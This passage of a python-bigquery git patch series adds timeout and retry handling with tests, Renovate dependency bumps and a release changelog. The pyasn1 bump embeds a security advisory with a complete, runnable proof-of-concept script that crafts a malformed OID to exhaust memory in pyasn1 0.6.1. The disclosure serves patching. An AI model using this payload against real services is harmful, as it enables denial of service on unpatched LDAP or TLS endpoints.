This ensures that the user-specified `timeout` is correctly passed down to the underlying `to_arrow` call, preventing the client from hanging indefinitely when the Storage API is unresponsive. **Changes** Modified `google/cloud/bigquery/retry.py`: Updated `_should_retry` to handle `TypeError` and `KeyError` when accessing `exc.errors`. Modified `google/cloud/bigquery/table.py`: Updated `RowIterator.to_dataframe` signature and implementation to accept and pass the `timeout` parameter. The first half of this work was completed in PR #2354 --- google/cloud/bigquery/_pandas_helpers.py | 49 +++++++-- google/cloud/bigquery/dbapi/cursor.py | 2 + google/cloud/bigquery/retry.py | 16 ++- google/cloud/bigquery/table.py | 6 +- tests/unit/job/test_query_pandas.py | 6 ++ tests/unit/test__pandas_helpers.py | 131 +++++++++++++++++++++++ tests/unit/test_client_retry.py | 7 +- tests/unit/test_dbapi_cursor.py | 6 +- tests/unit/test_table.py | 8 ++ 9 files changed, 214 insertions(+), 17 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 5460f7ca7..7bd9f99b6 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -33,6 +33,7 @@ from google.cloud.bigquery import _pyarrow_helpers from google.cloud.bigquery import _versions_helpers +from google.cloud.bigquery import retry as bq_retry from google.cloud.bigquery import schema @@ -740,7 +741,7 @@ def _row_iterator_page_to_arrow(page, column_names, arrow_types): return pyarrow.RecordBatch.from_arrays(arrays, names=column_names) -def download_arrow_row_iterator(pages, bq_schema): +def download_arrow_row_iterator(pages, bq_schema, timeout=None): """Use HTTP JSON RowIterator to construct an iterable of RecordBatches. Args: @@ -751,6 +752,10 @@ def download_arrow_row_iterator(pages, bq_schema): Mapping[str, Any] \ ]]): A decription of the fields in result pages. 
+ timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Yields: :class:`pyarrow.RecordBatch` The next page of records as a ``pyarrow`` record batch. @@ -759,8 +764,16 @@ def download_arrow_row_iterator(pages, bq_schema): column_names = bq_to_arrow_schema(bq_schema) or [field.name for field in bq_schema] arrow_types = [bq_to_arrow_data_type(field) for field in bq_schema] - for page in pages: - yield _row_iterator_page_to_arrow(page, column_names, arrow_types) + if timeout is None: + for page in pages: + yield _row_iterator_page_to_arrow(page, column_names, arrow_types) + else: + start_time = time.monotonic() + for page in pages: + if time.monotonic() - start_time > timeout: + raise concurrent.futures.TimeoutError() + + yield _row_iterator_page_to_arrow(page, column_names, arrow_types) def _row_iterator_page_to_dataframe(page, column_names, dtypes): @@ -778,7 +791,7 @@ def _row_iterator_page_to_dataframe(page, column_names, dtypes): return pandas.DataFrame(columns, columns=column_names) -def download_dataframe_row_iterator(pages, bq_schema, dtypes): +def download_dataframe_row_iterator(pages, bq_schema, dtypes, timeout=None): """Use HTTP JSON RowIterator to construct a DataFrame. Args: @@ -792,14 +805,27 @@ def download_dataframe_row_iterator(pages, bq_schema, dtypes): dtypes(Mapping[str, numpy.dtype]): The types of columns in result data to hint construction of the resulting DataFrame. Not all column types have to be specified. + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Yields: :class:`pandas.DataFrame` The next page of records as a ``pandas.DataFrame`` record batch. 
""" bq_schema = schema._to_schema_fields(bq_schema) column_names = [field.name for field in bq_schema] - for page in pages: - yield _row_iterator_page_to_dataframe(page, column_names, dtypes) + + if timeout is None: + for page in pages: + yield _row_iterator_page_to_dataframe(page, column_names, dtypes) + else: + start_time = time.monotonic() + for page in pages: + if time.monotonic() - start_time > timeout: + raise concurrent.futures.TimeoutError() + + yield _row_iterator_page_to_dataframe(page, column_names, dtypes) def _bqstorage_page_to_arrow(page): @@ -928,6 +954,7 @@ def _download_table_bqstorage( if "@" in table.table_id: raise ValueError("Reading from a specific snapshot is not currently supported.") + start_time = time.monotonic() requested_streams = determine_requested_streams(preserve_order, max_stream_count) requested_session = bigquery_storage.types.stream.ReadSession( @@ -944,10 +971,16 @@ def _download_table_bqstorage( ArrowSerializationOptions.CompressionCodec(1) ) + retry_policy = ( + bq_retry.DEFAULT_RETRY.with_deadline(timeout) if timeout is not None else None + ) + session = bqstorage_client.create_read_session( parent="projects/{}".format(project_id), read_session=requested_session, max_stream_count=requested_streams, + retry=retry_policy, + timeout=timeout, ) _LOGGER.debug( @@ -983,8 +1016,6 @@ def _download_table_bqstorage( # Manually manage the pool to control shutdown behavior on timeout. 
pool = concurrent.futures.ThreadPoolExecutor(max_workers=max(1, total_streams)) wait_on_shutdown = True - start_time = time.time() - try: # Manually submit jobs and wait for download to complete rather # than using pool.map because pool.map continues running in the @@ -1006,7 +1037,7 @@ def _download_table_bqstorage( while not_done: # Check for timeout if timeout is not None: - elapsed = time.time() - start_time + elapsed = time.monotonic() - start_time if elapsed > timeout: wait_on_shutdown = False raise concurrent.futures.TimeoutError( diff --git a/google/cloud/bigquery/dbapi/cursor.py b/google/cloud/bigquery/dbapi/cursor.py index 014a6825e..bffd7678f 100644 --- a/google/cloud/bigquery/dbapi/cursor.py +++ b/google/cloud/bigquery/dbapi/cursor.py @@ -323,6 +323,8 @@ def _bqstorage_fetch(self, bqstorage_client): read_session=requested_session, # a single stream only, as DB API is not well-suited for multithreading max_stream_count=1, + retry=None, + timeout=None, ) if not read_session.streams: diff --git a/google/cloud/bigquery/retry.py b/google/cloud/bigquery/retry.py index 19012efd6..6fd458df5 100644 --- a/google/cloud/bigquery/retry.py +++ b/google/cloud/bigquery/retry.py @@ -12,12 +12,15 @@ # See the License for the specific language governing permissions and # limitations under the License. +import logging + from google.api_core import exceptions from google.api_core import retry import google.api_core.future.polling from google.auth import exceptions as auth_exceptions # type: ignore import requests.exceptions +_LOGGER = logging.getLogger(__name__) _RETRYABLE_REASONS = frozenset( ["rateLimitExceeded", "backendError", "internalError", "badGateway"] @@ -61,14 +64,17 @@ def _should_retry(exc): """Predicate for determining when to retry. - We retry if and only if the 'reason' is 'backendError' - or 'rateLimitExceeded'. + We retry if and only if the 'reason' is in _RETRYABLE_REASONS or is + in _UNSTRUCTURED_RETRYABLE_TYPES. 
""" - if not hasattr(exc, "errors") or len(exc.errors) == 0: - # Check for unstructured error returns, e.g. from GFE + try: + reason = exc.errors[0]["reason"] + except (AttributeError, IndexError, TypeError, KeyError): + # Fallback for when errors attribute is missing, empty, or not a dict + # or doesn't contain "reason" (e.g. gRPC exceptions). + _LOGGER.debug("Inspecting unstructured error for retry: %r", exc) return isinstance(exc, _UNSTRUCTURED_RETRYABLE_TYPES) - reason = exc.errors[0]["reason"] return reason in _RETRYABLE_REASONS diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 195461006..88b673a8b 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -2152,7 +2152,10 @@ def to_arrow_iterable( timeout=timeout, ) tabledata_list_download = functools.partial( - _pandas_helpers.download_arrow_row_iterator, iter(self.pages), self.schema + _pandas_helpers.download_arrow_row_iterator, + iter(self.pages), + self.schema, + timeout=timeout, ) return self._to_page_iterable( bqstorage_download, @@ -2366,6 +2369,7 @@ def to_dataframe_iterable( iter(self.pages), self.schema, dtypes, + timeout=timeout, ) return self._to_page_iterable( bqstorage_download, diff --git a/tests/unit/job/test_query_pandas.py b/tests/unit/job/test_query_pandas.py index 4390309f1..e0e0438f5 100644 --- a/tests/unit/job/test_query_pandas.py +++ b/tests/unit/job/test_query_pandas.py @@ -179,6 +179,8 @@ def test_to_dataframe_bqstorage_preserve_order(query, table_read_options_kwarg): parent="projects/test-project", read_session=expected_session, max_stream_count=1, # Use a single stream to preserve row order. + retry=None, + timeout=None, ) @@ -593,6 +595,8 @@ def test_to_dataframe_bqstorage(table_read_options_kwarg): parent="projects/bqstorage-billing-project", read_session=expected_session, max_stream_count=0, # Use default number of streams for best performance. 
+ retry=None, + timeout=None, ) bqstorage_client.read_rows.assert_called_once_with(stream_id) @@ -644,6 +648,8 @@ def test_to_dataframe_bqstorage_no_pyarrow_compression(): parent="projects/bqstorage-billing-project", read_session=expected_session, max_stream_count=0, + retry=None, + timeout=None, ) diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index a1cbb726b..6ec62c0b6 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -2252,3 +2252,134 @@ def fast_download_stream( results = list(result_gen) assert results == ["result_page"] + + +@pytest.mark.skipif(pandas is None, reason="Requires `pandas`") +@pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") +@pytest.mark.parametrize( + "sleep_time, timeout, should_timeout", + [ + (0.1, 0.05, True), # Timeout case + (0, 10.0, False), # Success case + ], +) +def test_download_arrow_row_iterator_with_timeout( + module_under_test, sleep_time, timeout, should_timeout +): + bq_schema = [schema.SchemaField("name", "STRING")] + + # Mock page with to_arrow method + mock_page = mock.Mock() + mock_page.to_arrow.return_value = pyarrow.RecordBatch.from_arrays( + [pyarrow.array(["foo"])], + names=["name"], + ) + mock_page.__iter__ = lambda self: iter(["row1"]) + mock_page._columns = [["foo"]] + + def pages_gen(): + # First page yields quickly + yield mock_page + if sleep_time > 0: + time.sleep(sleep_time) + yield mock_page + + iterator = module_under_test.download_arrow_row_iterator( + pages_gen(), bq_schema, timeout=timeout + ) + + # First item should always succeed + next(iterator) + + if should_timeout: + with pytest.raises(concurrent.futures.TimeoutError): + next(iterator) + else: + # Should succeed and complete + results = list(iterator) + assert len(results) == 1 # 1 remaining item + + +@pytest.mark.skipif(pandas is None, reason="Requires `pandas`") +@pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires 
`pyarrow`") +@pytest.mark.parametrize( + "sleep_time, timeout, should_timeout", + [ + (0.1, 0.05, True), # Timeout case + (0, 10.0, False), # Success case + ], +) +def test_download_dataframe_row_iterator_with_timeout( + module_under_test, sleep_time, timeout, should_timeout +): + bq_schema = [schema.SchemaField("name", "STRING")] + dtypes = {} + + # Mock page + mock_page = mock.Mock() + # Mock iterator for _row_iterator_page_to_dataframe checking next(iter(page)) + mock_page.__iter__ = lambda self: iter(["row1"]) + mock_page._columns = [["foo"]] + + def pages_gen(): + yield mock_page + if sleep_time > 0: + time.sleep(sleep_time) + yield mock_page + + iterator = module_under_test.download_dataframe_row_iterator( + pages_gen(), bq_schema, dtypes, timeout=timeout + ) + + next(iterator) + + if should_timeout: + with pytest.raises(concurrent.futures.TimeoutError): + next(iterator) + else: + results = list(iterator) + assert len(results) == 1 + + +@pytest.mark.skipif( + bigquery_storage is None, reason="Requires `google-cloud-bigquery-storage`" +) +def test_download_arrow_bqstorage_passes_timeout_to_create_read_session( + module_under_test, +): + # Mock dependencies + project_id = "test-project" + table = mock.Mock() + table.table_id = "test_table" + table.to_bqstorage.return_value = "projects/test/datasets/test/tables/test" + + bqstorage_client = mock.create_autospec( + bigquery_storage.BigQueryReadClient, instance=True + ) + # Mock create_read_session to return a session with no streams so the function returns early + # (Checking start of loop logic vs empty streams return) + session = mock.Mock() + # If streams is empty, _download_table_bqstorage returns early, which is fine for this test + session.streams = [] + bqstorage_client.create_read_session.return_value = session + + # Call the function + timeout = 123.456 + # download_arrow_bqstorage yields frames, so we need to iterate to trigger execution + list( + module_under_test.download_arrow_bqstorage( + project_id, 
table, bqstorage_client, timeout=timeout + ) + ) + + # Verify timeout and retry were passed + bqstorage_client.create_read_session.assert_called_once() + _, kwargs = bqstorage_client.create_read_session.call_args + assert "timeout" in kwargs + assert kwargs["timeout"] == timeout + + assert "retry" in kwargs + retry_policy = kwargs["retry"] + assert retry_policy is not None + # Check if deadline is set correctly in the retry policy + assert retry_policy._deadline == timeout diff --git a/tests/unit/test_client_retry.py b/tests/unit/test_client_retry.py index 6e49cc464..f0e7ac88f 100644 --- a/tests/unit/test_client_retry.py +++ b/tests/unit/test_client_retry.py @@ -23,6 +23,11 @@ PROJECT = "test-project" +# A deadline > 1.0s is required because the default retry (google.api_core.retry.Retry) +# has an initial delay of 1.0s. If the deadline is <= 1.0s, the first retry attempt +# (scheduled for now + 1.0s) will be rejected immediately as exceeding the deadline. +_RETRY_DEADLINE = 10.0 + def _make_credentials(): import google.auth.credentials @@ -83,7 +88,7 @@ def test_call_api_applying_custom_retry_on_timeout(global_time_lock): "api_request", side_effect=[TimeoutError, "result"], ) - retry = DEFAULT_RETRY.with_deadline(1).with_predicate( + retry = DEFAULT_RETRY.with_deadline(_RETRY_DEADLINE).with_predicate( lambda exc: isinstance(exc, TimeoutError) ) diff --git a/tests/unit/test_dbapi_cursor.py b/tests/unit/test_dbapi_cursor.py index 6fca4cec0..c5cad8c91 100644 --- a/tests/unit/test_dbapi_cursor.py +++ b/tests/unit/test_dbapi_cursor.py @@ -480,7 +480,11 @@ def fake_ensure_bqstorage_client(bqstorage_client=None, **kwargs): data_format=bigquery_storage.DataFormat.ARROW, ) mock_bqstorage_client.create_read_session.assert_called_once_with( - parent="projects/P", read_session=expected_session, max_stream_count=1 + parent="projects/P", + read_session=expected_session, + max_stream_count=1, + retry=None, + timeout=None, ) # Check the data returned. 
diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 97a1b4916..a8397247d 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -4125,6 +4125,10 @@ def test_to_dataframe_tqdm_error(self): # Warn that a progress bar was requested, but creating the tqdm # progress bar failed. for warning in warned: # pragma: NO COVER + # Pyparsing warnings appear to be coming from a transitive + # dependency and are unrelated to the code under test. + if "Pyparsing" in warning.category.__name__: + continue self.assertIn( warning.category, [UserWarning, DeprecationWarning, tqdm.TqdmExperimentalWarning], @@ -6853,6 +6857,8 @@ def test_to_arrow_iterable_w_bqstorage_max_stream_count(preserve_order): parent=mock.ANY, read_session=mock.ANY, max_stream_count=max_stream_count if not preserve_order else 1, + retry=None, + timeout=None, ) @@ -6888,4 +6894,6 @@ def test_to_dataframe_iterable_w_bqstorage_max_stream_count(preserve_order): parent=mock.ANY, read_session=mock.ANY, max_stream_count=max_stream_count if not preserve_order else 1, + retry=None, + timeout=None, ) From d5cc42b71726fef46715587df6379c325979667a Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 12 Feb 2026 15:18:49 +0000 Subject: [PATCH 5/7] chore(deps): update dependency geopandas to v1.1.2 [security] (#2411) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [geopandas](https://redirect.github.com/geopandas/geopandas) | `==1.1.1` → `==1.1.2` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/geopandas/1.1.2?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/geopandas/1.1.1/1.1.2?slim=true) | ### GitHub Vulnerability Alerts #### [CVE-2025-69662](https://nvd.nist.gov/vuln/detail/CVE-2025-69662) SQL injection 
vulnerability in geopandas before v1.1.2 allows an attacker to obtain sensitive information via the `to_postgis()` function being used to write GeoDataFrames to a PostgreSQL database. --- ### Release Notes
geopandas/geopandas (geopandas) ### [`v1.1.2`](https://redirect.github.com/geopandas/geopandas/blob/HEAD/CHANGELOG.md#Version-112-December-22-2025) [Compare Source](https://redirect.github.com/geopandas/geopandas/compare/v1.1.1...v1.1.2) Bug fixes: - Fix an issue that caused an error in `GeoDataFrame.from_features` when there is no `properties` field ([#​3599](https://redirect.github.com/geopandas/geopandas/issues/3599)). - Fix `read_file` and `to_file` errors ([#​3682](https://redirect.github.com/geopandas/geopandas/issues/3682)) - Fix `read_parquet` with `to_pandas_kwargs` for complex (list/struct) arrow types ([#​3640](https://redirect.github.com/geopandas/geopandas/issues/3640)) - `value_counts` on GeoSeries now preserves CRS in index ([#​3669](https://redirect.github.com/geopandas/geopandas/issues/3669)) - Fix f-string placeholders appearing in error messages when `pyogrio` cannot be imported ([#​3682](https://redirect.github.com/geopandas/geopandas/issues/3682)). - Fix `read_parquet` with `to_pandas_kwargs` for complex (list/struct) arrow types ([#​3640](https://redirect.github.com/geopandas/geopandas/issues/3640)). - `.to_json` now provides a clearer error message when called on a GeoDataFrame without an active geometry column ([#​3648](https://redirect.github.com/geopandas/geopandas/issues/3648)). - Calling `del gdf["geometry"]` now will downcast to a `pd.DataFrame` if there are no geometry columns left in the dataframe ([#​3648](https://redirect.github.com/geopandas/geopandas/issues/3648)). - Fix SQL injection in `to_postgis` via geometry column name ([#​3681](https://redirect.github.com/geopandas/geopandas/issues/3681)).
--- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery). --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index dd94deab6..ab8d6b6f9 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -10,7 +10,7 @@ db-dtypes==1.4.3 Fiona==1.10.1 geojson==3.2.0 geopandas===1.0.1; python_version <= '3.9' -geopandas==1.1.1; python_version >= '3.10' +geopandas==1.1.2; python_version >= '3.10' google-api-core==2.25.2 google-auth==2.41.1 google-cloud-bigquery==3.38.0 From 80ca3f5b6be483220cbefae1241c855de92690a0 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 12 Feb 2026 15:50:09 +0000 Subject: [PATCH 6/7] chore(deps): update dependency pyasn1 to v0.6.2 [security] (#2407) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [pyasn1](https://redirect.github.com/pyasn1/pyasn1) ([changelog](https://pyasn1.readthedocs.io/en/latest/changelog.html)) | `==0.6.1` → `==0.6.2` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/pyasn1/0.6.2?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/pyasn1/0.6.1/0.6.2?slim=true) | ### 
GitHub Vulnerability Alerts #### [CVE-2026-23490](https://redirect.github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq) ### Summary After reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets. ### Details The integer issue can be found in the decoder as `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496 ### PoC For the DoS: ```py import pyasn1.codec.ber.decoder as decoder import pyasn1.type.univ as univ import sys import resource # Deliberately set memory limit to display PoC try: resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024)) print("[*] Memory limit set to 100MB") except: print("[-] Could not set memory limit") # Test with different payload sizes to find the DoS threshold payload_size_mb = int(sys.argv[1]) print(f"[*] Testing with {payload_size_mb}MB payload...") payload_size = payload_size_mb * 1024 * 1024 # Create payload with continuation octets # Each 0x81 byte indicates continuation, causing bit shifting in decoder payload = b'\x81' * payload_size + b'\x00' length = len(payload) # DER length encoding (supports up to 4GB) if length < 128: length_bytes = bytes([length]) elif length < 256: length_bytes = b'\x81' + length.to_bytes(1, 'big') elif length < 256**2: length_bytes = b'\x82' + length.to_bytes(2, 'big') elif length < 256**3: length_bytes = b'\x83' + length.to_bytes(3, 'big') else: # 4 bytes can handle up to 4GB length_bytes = b'\x84' + length.to_bytes(4, 'big') # Use OID (0x06) for more aggressive parsing malicious_packet = b'\x06' + length_bytes + payload print(f"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB") try: print("[*] Decoding (this may take time or exhaust memory)...") result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier()) print(f'[+] Decoded successfully') print(f'[!] 
Object size: {sys.getsizeof(result[0])} bytes') # Try to convert to string print('[*] Converting to string...') try: str_result = str(result[0]) print(f'[+] String succeeded: {len(str_result)} chars') if len(str_result) > 10000: print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!') except MemoryError: print(f'[-] MemoryError during string conversion!') except Exception as e: print(f'[-] {type(e).__name__} during string conversion') except MemoryError: print('[-] MemoryError: Out of memory!') except Exception as e: print(f'[-] Error: {type(e).__name__}: {e}') print("\n[*] Test completed") ``` Screenshots with the results: #### DoS Screenshot_20251219_160840 Screenshot_20251219_152815 #### Leak analysis A potential heap leak was investigated but came back clean: ``` [*] Creating 1000KB payload... [*] Decoding with pyasn1... [*] Materializing to string... [+] Decoded 2157784 characters [+] Binary representation: 896001 bytes [+] Dumped to heap_dump.bin [*] First 64 bytes (hex): 01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081 [*] First 64 bytes (ASCII/hex dump): 0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02 ..... @​..... @​.. 0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08 ... @​..... @​.... 0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20 . @​..... @​..... 0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81 @​..... @​..... @​. [*] Digit distribution analysis: '0': 10.1% '1': 9.9% '2': 10.0% '3': 9.9% '4': 9.9% '5': 10.0% '6': 10.0% '7': 10.0% '8': 9.9% '9': 10.1% ``` ### Scenario 1. An attacker creates a malicious X.509 certificate. 2. The application validates certificates. 3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above. ### Impact This issue can affect resource consumption and hang systems or stop services. This may affect: - LDAP servers - TLS/SSL endpoints - OCSP responders - etc. 
### Recommendation Add a limit to the allowed bytes in the decoder. --- ### Release Notes
pyasn1/pyasn1 (pyasn1) ### [`v0.6.2`](https://redirect.github.com/pyasn1/pyasn1/blob/HEAD/CHANGES.rst#Revision-062-released-16-01-2026) [Compare Source](https://redirect.github.com/pyasn1/pyasn1/compare/v0.6.1...v0.6.2) - CVE-2026-23490 (GHSA-63vm-454h-vhhq): Fixed continuation octet limits in OID/RELATIVE-OID decoder (thanks to tsigouris007) - Added support for Python 3.14 [pr #​97](https://redirect.github.com/pyasn1/pyasn1/pull/97) - Added SECURITY.md policy - Fixed unit tests failing due to missing code [issue #​91](https://redirect.github.com/pyasn1/pyasn1/issues/91) [pr #​92](https://redirect.github.com/pyasn1/pyasn1/pull/92) - Migrated to pyproject.toml packaging [pr #​90](https://redirect.github.com/pyasn1/pyasn1/pull/90)
--- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery). --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index ab8d6b6f9..5f4d686b3 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -27,7 +27,7 @@ packaging==25.0 pandas==2.3.3 proto-plus==1.26.1 pyarrow==21.0.0 -pyasn1==0.6.1 +pyasn1==0.6.2 pyasn1-modules==0.4.2 pycparser==2.23 pyparsing==3.2.5 From e8184fa38563b8e9aef265ec64836a931e9e89cd Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 12 Feb 2026 13:26:35 -0500 Subject: [PATCH 7/7] chore: librarian release pull request: 20260212T105312Z (#2415) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit PR created by the Librarian CLI to initialize a release. Merging this PR will auto trigger a release. Librarian Version: v0.8.0 Language Image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620
google-cloud-bigquery: 3.40.1 ## [3.40.1](https://togithub.com/googleapis/python-bigquery/compare/v3.40.0...v3.40.1) (2026-02-12) ### Bug Fixes * updates timeout/retry code to respect hanging server (#2408) ([24d45d0d](https://togithub.com/googleapis/python-bigquery/commit/24d45d0d)) * add timeout parameter to to_dataframe and to_arrow met… (#2354) ([4f67ba20](https://togithub.com/googleapis/python-bigquery/commit/4f67ba20)) ### Documentation * clarify that only jobs.query and jobs.getQueryResults are affec… (#2349) ([73228432](https://togithub.com/googleapis/python-bigquery/commit/73228432))
--- .librarian/state.yaml | 2 +- CHANGELOG.md | 13 +++++++++++++ google/cloud/bigquery/version.py | 2 +- 3 files changed, 15 insertions(+), 2 deletions(-) diff --git a/.librarian/state.yaml b/.librarian/state.yaml index 71bcf16ad..efce633f2 100644 --- a/.librarian/state.yaml +++ b/.librarian/state.yaml @@ -1,7 +1,7 @@ image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620 libraries: - id: google-cloud-bigquery - version: 3.40.0 + version: 3.40.1 last_generated_commit: "" apis: [] source_roots: diff --git a/CHANGELOG.md b/CHANGELOG.md index 242165933..083dbfc4f 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -4,6 +4,19 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.40.1](https://github.com/googleapis/google-cloud-python/compare/google-cloud-bigquery-v3.40.0...google-cloud-bigquery-v3.40.1) (2026-02-12) + + +### Documentation + +* clarify that only jobs.query and jobs.getQueryResults are affec… (#2349) ([73228432a3c821db05d898ea4a4788adf15b033d](https://github.com/googleapis/google-cloud-python/commit/73228432a3c821db05d898ea4a4788adf15b033d)) + + +### Bug Fixes + +* updates timeout/retry code to respect hanging server (#2408) ([24d45d0d5bf89762f253ba6bd6fdbee9d5993422](https://github.com/googleapis/google-cloud-python/commit/24d45d0d5bf89762f253ba6bd6fdbee9d5993422)) +* add timeout parameter to to_dataframe and to_arrow met… (#2354) ([4f67ba20b49159e81f645ed98e401b9bb1359c1a](https://github.com/googleapis/google-cloud-python/commit/4f67ba20b49159e81f645ed98e401b9bb1359c1a)) + ## [3.40.0](https://github.com/googleapis/google-cloud-python/compare/google-cloud-bigquery-v3.39.0...google-cloud-bigquery-v3.40.0) (2026-01-08) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 6b0fa0fba..2519009bf 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # 
See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.40.0" +__version__ = "3.40.1"